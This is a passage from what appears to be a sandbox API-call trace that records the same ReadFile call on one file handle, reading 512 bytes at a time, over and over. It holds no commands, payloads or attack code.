hFile=0x58, lpBuffer=0x12efac, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x12e19c, lpOverlapped=0x0 | out: lpBuffer=0x12efac*, lpNumberOfBytesRead=0x12e19c*=0x200, lpOverlapped=0x0) returned 1 [0202.976] ReadFile (in: hFile=0x58, lpBuffer=0x12efac, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x12e19c, lpOverlapped=0x0 | out: lpBuffer=0x12efac*, lpNumberOfBytesRead=0x12e19c*=0x200, lpOverlapped=0x0) returned 1 [0202.976] ReadFile (in: hFile=0x58, lpBuffer=0x12efac, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x12e19c, lpOverlapped=0x0 | out: lpBuffer=0x12efac*, lpNumberOfBytesRead=0x12e19c*=0x200, lpOverlapped=0x0) returned 1 [0202.976] ReadFile (in: hFile=0x58, lpBuffer=0x12efac, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x12e19c, lpOverlapped=0x0 | out: lpBuffer=0x12efac*, lpNumberOfBytesRead=0x12e19c*=0x200, lpOverlapped=0x0) returned 1 [0202.976] ReadFile (in: hFile=0x58, lpBuffer=0x12efac, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x12e19c, lpOverlapped=0x0 | out: lpBuffer=0x12efac*, lpNumberOfBytesRead=0x12e19c*=0x200, lpOverlapped=0x0) returned 1 [0202.976] ReadFile (in: hFile=0x58, lpBuffer=0x12efac, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x12e19c, lpOverlapped=0x0 | out: lpBuffer=0x12efac*, lpNumberOfBytesRead=0x12e19c*=0x200, lpOverlapped=0x0) returned 1 [0202.976] ReadFile (in: hFile=0x58, lpBuffer=0x12efac, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x12e19c, lpOverlapped=0x0 | out: lpBuffer=0x12efac*, lpNumberOfBytesRead=0x12e19c*=0x200, lpOverlapped=0x0) returned 1 [0202.976] ReadFile (in: hFile=0x58, lpBuffer=0x12efac, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x12e19c, lpOverlapped=0x0 | out: lpBuffer=0x12efac*, lpNumberOfBytesRead=0x12e19c*=0x200, lpOverlapped=0x0) returned 1 [0202.976] ReadFile (in: hFile=0x58, lpBuffer=0x12efac, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x12e19c, lpOverlapped=0x0 | out: lpBuffer=0x12efac*, lpNumberOfBytesRead=0x12e19c*=0x200, lpOverlapped=0x0) returned 1 [0202.977] ReadFile (in: hFile=0x58, lpBuffer=0x12efac, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x12e19c, lpOverlapped=0x0 | out: lpBuffer=0x12efac*, lpNumberOfBytesRead=0x12e19c*=0x200, lpOverlapped=0x0) returned 1 [0202.977] ReadFile (in: hFile=0x58, lpBuffer=0x12efac, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x12e19c, lpOverlapped=0x0 | out: lpBuffer=0x12efac*, lpNumberOfBytesRead=0x12e19c*=0x200, lpOverlapped=0x0) returned 1 [0202.983] ReadFile (in: hFile=0x58, lpBuffer=0x12efac, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x12e19c, lpOverlapped=0x0 | out: lpBuffer=0x12efac*, lpNumberOfBytesRead=0x12e19c*=0x200, lpOverlapped=0x0) returned 1 [0202.984] ReadFile (in: hFile=0x58, lpBuffer=0x12efac, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x12e19c, lpOverlapped=0x0 | out: lpBuffer=0x12efac*, lpNumberOfBytesRead=0x12e19c*=0x200, lpOverlapped=0x0) returned 1 [0202.984] ReadFile (in: hFile=0x58, lpBuffer=0x12efac, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x12e19c, lpOverlapped=0x0 | out: lpBuffer=0x12efac*, lpNumberOfBytesRead=0x12e19c*=0x200, lpOverlapped=0x0) returned 1 [0202.984] ReadFile (in: hFile=0x58, lpBuffer=0x12efac, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x12e19c, lpOverlapped=0x0 | out: lpBuffer=0x12efac*, lpNumberOfBytesRead=0x12e19c*=0x200, lpOverlapped=0x0) returned 1 [0202.984] ReadFile (in: hFile=0x58, lpBuffer=0x12efac, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x12e19c, lpOverlapped=0x0 | out: lpBuffer=0x12efac*, lpNumberOfBytesRead=0x12e19c*=0x200, lpOverlapped=0x0) returned 1 [0202.984] ReadFile (in: hFile=0x58, lpBuffer=0x12efac, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x12e19c, lpOverlapped=0x0 | out: lpBuffer=0x12efac*, lpNumberOfBytesRead=0x12e19c*=0x200, lpOverlapped=0x0) returned 1 [0202.984] ReadFile (in: hFile=0x58, lpBuffer=0x12efac, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x12e19c, lpOverlapped=0x0 | out: lpBuffer=0x12efac*, lpNumberOfBytesRead=0x12e19c*=0x200, lpOverlapped=0x0) returned 1 [0202.984] ReadFile (in: hFile=0x58, lpBuffer=0x12efac, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x12e19c, lpOverlapped=0x0 | out: lpBuffer=0x12efac*, lpNumberOfBytesRead=0x12e19c*=0x200, lpOverlapped=0x0) returned 1 [0202.984] ReadFile (in: hFile=0x58, lpBuffer=0x12efac, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x12e19c, lpOverlapped=0x0 | out: lpBuffer=0x12efac*, lpNumberOfBytesRead=0x12e19c*=0x200, lpOverlapped=0x0) returned 1 [0202.984] ReadFile (in: hFile=0x58, lpBuffer=0x12efac, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x12e19c, lpOverlapped=0x0 | out: lpBuffer=0x12efac*, lpNumberOfBytesRead=0x12e19c*=0x200, lpOverlapped=0x0) returned 1 [0202.985] ReadFile (in: hFile=0x58, lpBuffer=0x12efac, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x12e19c, lpOverlapped=0x0 | out: lpBuffer=0x12efac*, lpNumberOfBytesRead=0x12e19c*=0x200, lpOverlapped=0x0) returned 1 [0202.985] ReadFile (in: hFile=0x58, lpBuffer=0x12efac, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x12e19c, lpOverlapped=0x0 | out: lpBuffer=0x12efac*, lpNumberOfBytesRead=0x12e19c*=0x200, lpOverlapped=0x0) returned 1 [0202.985] ReadFile (in: hFile=0x58, lpBuffer=0x12efac, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x12e19c, lpOverlapped=0x0 | out: lpBuffer=0x12efac*, lpNumberOfBytesRead=0x12e19c*=0x200, lpOverlapped=0x0) returned 1 [0202.985] ReadFile (in: hFile=0x58, lpBuffer=0x12efac, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x12e19c, lpOverlapped=0x0 | out: lpBuffer=0x12efac*, lpNumberOfBytesRead=0x12e19c*=0x200, lpOverlapped=0x0) returned 1 [0202.985] ReadFile (in: hFile=0x58, lpBuffer=0x12efac, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x12e19c, lpOverlapped=0x0 | out: lpBuffer=0x12efac*, lpNumberOfBytesRead=0x12e19c*=0x200, lpOverlapped=0x0) returned 1 [0202.985] ReadFile (in: hFile=0x58, lpBuffer=0x12efac, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x12e19c, lpOverlapped=0x0 | out: lpBuffer=0x12efac*, lpNumberOfBytesRead=0x12e19c*=0x200, lpOverlapped=0x0) returned 1 [0202.985] ReadFile (in: hFile=0x58, lpBuffer=0x12efac, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x12e19c, lpOverlapped=0x0 | out: lpBuffer=0x12efac*, lpNumberOfBytesRead=0x12e19c*=0x200, lpOverlapped=0x0) returned 1 [0202.985] ReadFile (in: hFile=0x58, lpBuffer=0x12efac, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x12e19c, lpOverlapped=0x0 | out: lpBuffer=0x12efac*, lpNumberOfBytesRead=0x12e19c*=0x200, lpOverlapped=0x0) returned 1 [0202.985] ReadFile (in: hFile=0x58, lpBuffer=0x12efac, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x12e19c, lpOverlapped=0x0 | out: lpBuffer=0x12efac*, lpNumberOfBytesRead=0x12e19c*=0x200, lpOverlapped=0x0) returned 1 [0202.986] ReadFile (in: hFile=0x58, lpBuffer=0x12efac, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x12e19c, lpOverlapped=0x0 | out: lpBuffer=0x12efac*, lpNumberOfBytesRead=0x12e19c*=0x200, lpOverlapped=0x0) returned 1 [0202.986] ReadFile (in: hFile=0x58, lpBuffer=0x12efac, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x12e19c, lpOverlapped=0x0 | out: lpBuffer=0x12efac*, lpNumberOfBytesRead=0x12e19c*=0x200, lpOverlapped=0x0) returned 1 [0202.986] ReadFile (in: hFile=0x58, lpBuffer=0x12efac, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x12e19c, lpOverlapped=0x0 | out: lpBuffer=0x12efac*, lpNumberOfBytesRead=0x12e19c*=0x200, lpOverlapped=0x0) returned 1 [0202.986] ReadFile (in: hFile=0x58, lpBuffer=0x12efac, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x12e19c, lpOverlapped=0x0 | out: lpBuffer=0x12efac*, lpNumberOfBytesRead=0x12e19c*=0x200, lpOverlapped=0x0) returned 1 [0202.986] ReadFile (in: hFile=0x58, lpBuffer=0x12efac, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x12e19c, lpOverlapped=0x0 | out: lpBuffer=0x12efac*, lpNumberOfBytesRead=0x12e19c*=0x200, lpOverlapped=0x0) returned 1 [0202.986] ReadFile (in: hFile=0x58, lpBuffer=0x12efac, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x12e19c, lpOverlapped=0x0 | out: lpBuffer=0x12efac*, lpNumberOfBytesRead=0x12e19c*=0x200, lpOverlapped=0x0) returned 1 [0202.986] ReadFile (in: hFile=0x58, lpBuffer=0x12efac, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x12e19c, lpOverlapped=0x0 | out: lpBuffer=0x12efac*, lpNumberOfBytesRead=0x12e19c*=0x200, lpOverlapped=0x0) returned 1 [0202.987] ReadFile (in: hFile=0x58, lpBuffer=0x12efac, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x12e19c, lpOverlapped=0x0 | out: lpBuffer=0x12efac*, lpNumberOfBytesRead=0x12e19c*=0x200, lpOverlapped=0x0) returned 1 [0202.987] ReadFile (in: hFile=0x58, lpBuffer=0x12efac, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x12e19c, lpOverlapped=0x0 | out: lpBuffer=0x12efac*, lpNumberOfBytesRead=0x12e19c*=0x200, lpOverlapped=0x0) returned 1 [0202.987] ReadFile (in: hFile=0x58, lpBuffer=0x12efac, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x12e19c, lpOverlapped=0x0 | out: lpBuffer=0x12efac*, lpNumberOfBytesRead=0x12e19c*=0x200, lpOverlapped=0x0) returned 1 [0202.987] ReadFile (in: hFile=0x58, lpBuffer=0x12efac, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x12e19c, lpOverlapped=0x0 | out: lpBuffer=0x12efac*, lpNumberOfBytesRead=0x12e19c*=0x200, lpOverlapped=0x0) returned 1 [0202.987] ReadFile (in: hFile=0x58, lpBuffer=0x12efac, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x12e19c, lpOverlapped=0x0 | out: lpBuffer=0x12efac*, lpNumberOfBytesRead=0x12e19c*=0x200, lpOverlapped=0x0) returned 1 [0202.987] ReadFile (in: hFile=0x58, lpBuffer=0x12efac, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x12e19c, lpOverlapped=0x0 | out: lpBuffer=0x12efac*, lpNumberOfBytesRead=0x12e19c*=0x200, lpOverlapped=0x0) returned 1 [0202.987] ReadFile (in: hFile=0x58, lpBuffer=0x12efac, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x12e19c, lpOverlapped=0x0 | out: lpBuffer=0x12efac*, lpNumberOfBytesRead=0x12e19c*=0x200, lpOverlapped=0x0) returned 1 [0202.987] ReadFile (in: hFile=0x58, lpBuffer=0x12efac, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x12e19c, lpOverlapped=0x0 | out: lpBuffer=0x12efac*, lpNumberOfBytesRead=0x12e19c*=0x200, lpOverlapped=0x0) returned 1 [0202.987] ReadFile (in: hFile=0x58, lpBuffer=0x12efac, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x12e19c, lpOverlapped=0x0 | out: lpBuffer=0x12efac*, lpNumberOfBytesRead=0x12e19c*=0x200, lpOverlapped=0x0) returned 1 [0202.987] ReadFile (in: hFile=0x58, lpBuffer=0x12efac, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x12e19c, lpOverlapped=0x0 | out: lpBuffer=0x12efac*, lpNumberOfBytesRead=0x12e19c*=0x200, lpOverlapped=0x0) returned 1 [0202.987] ReadFile (in: hFile=0x58, lpBuffer=0x12efac, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x12e19c, lpOverlapped=0x0 | out: lpBuffer=0x12efac*, lpNumberOfBytesRead=0x12e19c*=0x200, lpOverlapped=0x0) returned 1 [0202.987] ReadFile (in: hFile=0x58, lpBuffer=0x12efac, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x12e19c, lpOverlapped=0x0 | out: lpBuffer=0x12efac*, lpNumberOfBytesRead=0x12e19c*=0x200, lpOverlapped=0x0) returned 1 [0202.988] ReadFile (in: hFile=0x58, lpBuffer=0x12efac, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x12e19c, lpOverlapped=0x0 | out: lpBuffer=0x12efac*, lpNumberOfBytesRead=0x12e19c*=0x200, lpOverlapped=0x0) returned 1 [0202.988] ReadFile (in: hFile=0x58, lpBuffer=0x12efac, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x12e19c, lpOverlapped=0x0 | out: lpBuffer=0x12efac*, lpNumberOfBytesRead=0x12e19c*=0x200, lpOverlapped=0x0) returned 1 [0202.988] ReadFile (in: hFile=0x58, lpBuffer=0x12efac, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x12e19c, lpOverlapped=0x0 | out: lpBuffer=0x12efac*, lpNumberOfBytesRead=0x12e19c*=0x200, lpOverlapped=0x0) returned 1 [0202.988] ReadFile (in: hFile=0x58, lpBuffer=0x12efac, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x12e19c, lpOverlapped=0x0 | out: lpBuffer=0x12efac*, lpNumberOfBytesRead=0x12e19c*=0x200, lpOverlapped=0x0) returned 1 [0202.988] ReadFile (in: hFile=0x58, lpBuffer=0x12efac, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x12e19c, lpOverlapped=0x0 | out: lpBuffer=0x12efac*, lpNumberOfBytesRead=0x12e19c*=0x200, lpOverlapped=0x0) returned 1 [0202.988] ReadFile (in: hFile=0x58, lpBuffer=0x12efac, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x12e19c, lpOverlapped=0x0 | out: lpBuffer=0x12efac*, lpNumberOfBytesRead=0x12e19c*=0x200, lpOverlapped=0x0) returned 1 [0202.988] ReadFile (in: hFile=0x58, lpBuffer=0x12efac, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x12e19c, lpOverlapped=0x0 | out: lpBuffer=0x12efac*, lpNumberOfBytesRead=0x12e19c*=0x200, lpOverlapped=0x0) returned 1 [0202.988] ReadFile (in: hFile=0x58, lpBuffer=0x12efac, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x12e19c, lpOverlapped=0x0 | out: lpBuffer=0x12efac*, lpNumberOfBytesRead=0x12e19c*=0x200, lpOverlapped=0x0) returned 1 [0202.988] ReadFile (in: hFile=0x58, lpBuffer=0x12efac, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x12e19c, lpOverlapped=0x0 | out: lpBuffer=0x12efac*, lpNumberOfBytesRead=0x12e19c*=0x200, lpOverlapped=0x0) returned 1 [0202.988] ReadFile (in: hFile=0x58, lpBuffer=0x12efac, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x12e19c, lpOverlapped=0x0 | out: lpBuffer=0x12efac*, lpNumberOfBytesRead=0x12e19c*=0x200, lpOverlapped=0x0) returned 1 [0202.988] ReadFile (in: hFile=0x58, lpBuffer=0x12efac, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x12e19c, lpOverlapped=0x0 | out: lpBuffer=0x12efac*, lpNumberOfBytesRead=0x12e19c*=0x200, lpOverlapped=0x0) returned 1 [0202.989] ReadFile (in: hFile=0x58, lpBuffer=0x12efac, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x12e19c, lpOverlapped=0x0 | out: lpBuffer=0x12efac*, lpNumberOfBytesRead=0x12e19c*=0x200, lpOverlapped=0x0) returned 1 [0202.989] ReadFile (in: hFile=0x58, lpBuffer=0x12efac, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x12e19c, lpOverlapped=0x0 | out: lpBuffer=0x12efac*, lpNumberOfBytesRead=0x12e19c*=0x200, lpOverlapped=0x0) returned 1 [0202.989] ReadFile (in: hFile=0x58, lpBuffer=0x12efac, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x12e19c, lpOverlapped=0x0 | out: lpBuffer=0x12efac*, lpNumberOfBytesRead=0x12e19c*=0x200, lpOverlapped=0x0) returned 1 [0202.989] ReadFile (in: hFile=0x58, lpBuffer=0x12efac, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x12e19c, lpOverlapped=0x0 | out: lpBuffer=0x12efac*, lpNumberOfBytesRead=0x12e19c*=0x200, lpOverlapped=0x0) returned 1 [0202.989] ReadFile (in: hFile=0x58, lpBuffer=0x12efac, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x12e19c, lpOverlapped=0x0 | out: lpBuffer=0x12efac*, lpNumberOfBytesRead=0x12e19c*=0x200, lpOverlapped=0x0) returned 1 [0202.989] ReadFile (in: hFile=0x58, lpBuffer=0x12efac, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x12e19c, lpOverlapped=0x0 | out: lpBuffer=0x12efac*, lpNumberOfBytesRead=0x12e19c*=0x200, lpOverlapped=0x0) returned 1 [0202.989] ReadFile (in: hFile=0x58, lpBuffer=0x12efac, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x12e19c, lpOverlapped=0x0 | out: lpBuffer=0x12efac*, lpNumberOfBytesRead=0x12e19c*=0x200, lpOverlapped=0x0) returned 1 [0202.989] ReadFile (in: hFile=0x58, lpBuffer=0x12efac, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x12e19c, lpOverlapped=0x0 | out: lpBuffer=0x12efac*, lpNumberOfBytesRead=0x12e19c*=0x200, lpOverlapped=0x0) returned 1 [0202.989] ReadFile (in: hFile=0x58, lpBuffer=0x12efac, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x12e19c, lpOverlapped=0x0 | out: lpBuffer=0x12efac*, lpNumberOfBytesRead=0x12e19c*=0x200, lpOverlapped=0x0) returned 1 [0202.989] ReadFile (in: hFile=0x58, lpBuffer=0x12efac, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x12e19c, lpOverlapped=0x0 | out: lpBuffer=0x12efac*, lpNumberOfBytesRead=0x12e19c*=0x200, lpOverlapped=0x0) returned 1 [0202.989] ReadFile (in: hFile=0x58, lpBuffer=0x12efac, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x12e19c, lpOverlapped=0x0 | out: lpBuffer=0x12efac*, lpNumberOfBytesRead=0x12e19c*=0x200, lpOverlapped=0x0) returned 1 [0202.990] ReadFile (in: hFile=0x58, lpBuffer=0x12efac, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x12e19c, lpOverlapped=0x0 | out: lpBuffer=0x12efac*, lpNumberOfBytesRead=0x12e19c*=0x200, lpOverlapped=0x0) returned 1 [0202.990] ReadFile (in: hFile=0x58, lpBuffer=0x12efac, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x12e19c, lpOverlapped=0x0 | out: lpBuffer=0x12efac*, lpNumberOfBytesRead=0x12e19c*=0x200, lpOverlapped=0x0) returned 1 [0202.990] ReadFile (in: hFile=0x58, lpBuffer=0x12efac, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x12e19c, lpOverlapped=0x0 | out: lpBuffer=0x12efac*, lpNumberOfBytesRead=0x12e19c*=0x200, lpOverlapped=0x0) returned 1 [0202.990] ReadFile (in: hFile=0x58, lpBuffer=0x12efac, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x12e19c, lpOverlapped=0x0 | out: lpBuffer=0x12efac*, lpNumberOfBytesRead=0x12e19c*=0x200, lpOverlapped=0x0) returned 1 [0202.990] ReadFile (in: hFile=0x58, lpBuffer=0x12efac, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x12e19c, lpOverlapped=0x0 | out: lpBuffer=0x12efac*, lpNumberOfBytesRead=0x12e19c*=0x200, lpOverlapped=0x0) returned 1 [0202.990] ReadFile (in: hFile=0x58, lpBuffer=0x12efac, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x12e19c, lpOverlapped=0x0 | out: lpBuffer=0x12efac*, lpNumberOfBytesRead=0x12e19c*=0x200, lpOverlapped=0x0) returned 1 [0202.990] ReadFile (in: hFile=0x58, lpBuffer=0x12efac, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x12e19c, lpOverlapped=0x0 | out: lpBuffer=0x12efac*, lpNumberOfBytesRead=0x12e19c*=0x200, lpOverlapped=0x0) returned 1 [0202.990] ReadFile (in: hFile=0x58, lpBuffer=0x12efac, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x12e19c, lpOverlapped=0x0 | out: lpBuffer=0x12efac*, lpNumberOfBytesRead=0x12e19c*=0x200, lpOverlapped=0x0) returned 1 [0202.990] ReadFile (in: hFile=0x58, lpBuffer=0x12efac, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x12e19c, lpOverlapped=0x0 | out: lpBuffer=0x12efac*, lpNumberOfBytesRead=0x12e19c*=0x200, lpOverlapped=0x0) returned 1 [0202.990] ReadFile (in: hFile=0x58, lpBuffer=0x12efac, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x12e19c, lpOverlapped=0x0 | out: lpBuffer=0x12efac*, lpNumberOfBytesRead=0x12e19c*=0x200, lpOverlapped=0x0) returned 1 [0202.990] ReadFile (in: hFile=0x58, lpBuffer=0x12efac, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x12e19c, lpOverlapped=0x0 | out: lpBuffer=0x12efac*, lpNumberOfBytesRead=0x12e19c*=0x200, lpOverlapped=0x0) returned 1 [0202.990] ReadFile (in: hFile=0x58, lpBuffer=0x12efac, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x12e19c, lpOverlapped=0x0 | out: lpBuffer=0x12efac*, lpNumberOfBytesRead=0x12e19c*=0x200, lpOverlapped=0x0) returned 1 [0202.991] ReadFile (in: hFile=0x58, lpBuffer=0x12efac, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x12e19c, lpOverlapped=0x0 | out: lpBuffer=0x12efac*, lpNumberOfBytesRead=0x12e19c*=0x200, lpOverlapped=0x0) returned 1 [0202.991] ReadFile (in: hFile=0x58, lpBuffer=0x12efac, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x12e19c, lpOverlapped=0x0 | out: lpBuffer=0x12efac*, lpNumberOfBytesRead=0x12e19c*=0x200, lpOverlapped=0x0) returned 1 [0202.991] ReadFile (in: hFile=0x58, lpBuffer=0x12efac, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x12e19c, lpOverlapped=0x0 | out: lpBuffer=0x12efac*, lpNumberOfBytesRead=0x12e19c*=0x200, lpOverlapped=0x0) returned 1 [0202.991] ReadFile (in: hFile=0x58, lpBuffer=0x12efac, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x12e19c, lpOverlapped=0x0 | out: lpBuffer=0x12efac*, lpNumberOfBytesRead=0x12e19c*=0x200, lpOverlapped=0x0) returned 1 [0202.991] ReadFile (in: hFile=0x58, lpBuffer=0x12efac, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x12e19c, lpOverlapped=0x0 | out: lpBuffer=0x12efac*, lpNumberOfBytesRead=0x12e19c*=0x200, lpOverlapped=0x0) returned 1 [0202.991] ReadFile (in: hFile=0x58, lpBuffer=0x12efac, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x12e19c, lpOverlapped=0x0 | out: lpBuffer=0x12efac*, lpNumberOfBytesRead=0x12e19c*=0x200, lpOverlapped=0x0) returned 1 [0202.991] ReadFile (in: hFile=0x58, lpBuffer=0x12efac, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x12e19c, lpOverlapped=0x0 | out: lpBuffer=0x12efac*, lpNumberOfBytesRead=0x12e19c*=0x200, lpOverlapped=0x0) returned 1 [0202.991] ReadFile (in: hFile=0x58, lpBuffer=0x12efac, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x12e19c, lpOverlapped=0x0 | out: lpBuffer=0x12efac*, lpNumberOfBytesRead=0x12e19c*=0x200, lpOverlapped=0x0) returned 1 [0202.991] ReadFile (in: hFile=0x58, lpBuffer=0x12efac, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x12e19c, lpOverlapped=0x0 | out: lpBuffer=0x12efac*, lpNumberOfBytesRead=0x12e19c*=0x200, lpOverlapped=0x0) returned 1 [0202.991] ReadFile (in: hFile=0x58, lpBuffer=0x12efac, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x12e19c, lpOverlapped=0x0 | out: lpBuffer=0x12efac*, lpNumberOfBytesRead=0x12e19c*=0x200, lpOverlapped=0x0) returned 1 [0202.991] ReadFile (in: hFile=0x58, lpBuffer=0x12efac, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x12e19c, lpOverlapped=0x0 | out: lpBuffer=0x12efac*, lpNumberOfBytesRead=0x12e19c*=0x200, lpOverlapped=0x0) returned 1 [0202.992] ReadFile (in: hFile=0x58, lpBuffer=0x12efac, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x12e19c, lpOverlapped=0x0 | out: lpBuffer=0x12efac*, lpNumberOfBytesRead=0x12e19c*=0x200, lpOverlapped=0x0) returned 1 [0202.992] ReadFile (in: hFile=0x58, lpBuffer=0x12efac, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x12e19c, lpOverlapped=0x0 | out: lpBuffer=0x12efac*, lpNumberOfBytesRead=0x12e19c*=0x200, lpOverlapped=0x0) returned 1 [0202.992] ReadFile (in: hFile=0x58, lpBuffer=0x12efac, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x12e19c, lpOverlapped=0x0 | out: lpBuffer=0x12efac*, lpNumberOfBytesRead=0x12e19c*=0x200, lpOverlapped=0x0) returned 1 [0202.992] ReadFile (in: hFile=0x58, lpBuffer=0x12efac, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x12e19c, lpOverlapped=0x0 | out: lpBuffer=0x12efac*, lpNumberOfBytesRead=0x12e19c*=0x200, lpOverlapped=0x0) returned 1 [0202.992] ReadFile (in: hFile=0x58, lpBuffer=0x12efac, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x12e19c, lpOverlapped=0x0 | out: lpBuffer=0x12efac*, lpNumberOfBytesRead=0x12e19c*=0x200, lpOverlapped=0x0) returned 1 [0202.992] ReadFile (in: hFile=0x58, lpBuffer=0x12efac, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x12e19c, lpOverlapped=0x0 | out: lpBuffer=0x12efac*, lpNumberOfBytesRead=0x12e19c*=0x200, lpOverlapped=0x0) returned 1 [0202.992] ReadFile (in: hFile=0x58, lpBuffer=0x12efac, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x12e19c, lpOverlapped=0x0 | out: lpBuffer=0x12efac*, lpNumberOfBytesRead=0x12e19c*=0x200, lpOverlapped=0x0) returned 1 [0202.992] ReadFile (in: hFile=0x58, lpBuffer=0x12efac, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x12e19c, lpOverlapped=0x0 | out: lpBuffer=0x12efac*, lpNumberOfBytesRead=0x12e19c*=0x200, lpOverlapped=0x0) returned 1 [0202.992] ReadFile (in: hFile=0x58, lpBuffer=0x12efac, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x12e19c, lpOverlapped=0x0 | out: lpBuffer=0x12efac*, lpNumberOfBytesRead=0x12e19c*=0x200, lpOverlapped=0x0) returned 1 [0202.992] ReadFile (in: hFile=0x58, lpBuffer=0x12efac, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x12e19c, lpOverlapped=0x0 | out: lpBuffer=0x12efac*, lpNumberOfBytesRead=0x12e19c*=0x200, lpOverlapped=0x0) returned 1 [0202.992] ReadFile (in: hFile=0x58, lpBuffer=0x12efac, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x12e19c, lpOverlapped=0x0 | out: lpBuffer=0x12efac*, lpNumberOfBytesRead=0x12e19c*=0x200, lpOverlapped=0x0) returned 